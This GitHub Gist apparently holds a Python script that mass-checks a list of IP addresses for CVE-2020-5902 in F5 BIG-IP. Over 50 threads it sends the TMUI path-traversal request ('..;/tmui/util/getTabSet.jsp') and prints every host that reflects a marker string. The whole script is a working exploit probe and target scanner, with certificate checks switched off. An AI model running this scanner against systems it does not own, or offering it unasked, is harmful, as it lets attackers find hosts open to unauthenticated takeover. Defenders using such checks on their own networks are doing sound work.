Last active
July 5, 2020 11:32
-
-
Save akhil-reni/ae7d2322504cad35bc78af3edc8cf2a4 to your computer and use it in GitHub Desktop.
Check CVE-2020-5902 on a list of IPs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import logging | |
| from concurrent.futures import ThreadPoolExecutor | |
| import asyncio | |
| from urllib3.exceptions import InsecureRequestWarning | |
| # Suppress only the single warning from urllib3 needed. | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
| logger = logging.getLogger(__name__) | |
| class TaskExecuter: | |
| def __init__(self, threads): | |
| self.pool = ThreadPoolExecutor(threads) | |
| self.results = [] | |
| self.tasks = [] | |
| async def execute_task(self, func, **kwargs): | |
| future = self.pool.submit(func, **kwargs) | |
| awaitable = asyncio.wrap_future(future) | |
| return await awaitable | |
| def add_task(self, func): | |
| self.tasks.append(func) | |
| async def app(self): | |
| result = await asyncio.gather(*self.tasks) | |
| self.results.append(result) | |
| task_obj = TaskExecuter(50) | |
| def get_vulnerable(url): | |
| r = requests.get(url, verify=False, allow_redirects=True) | |
| if r.status_code == 200: | |
| if "iamthereintheresponse" in r.text: | |
| print(url) | |
| return url | |
| with open("ips.txt", "r") as f: | |
| lines = f.read().splitlines() | |
| for line in lines: | |
| task_obj.add_task(task_obj.execute_task(get_vulnerable, url="https://"+line+"/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=iamthereintheresponse", )) | |
| asyncio.run(task_obj.app()) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment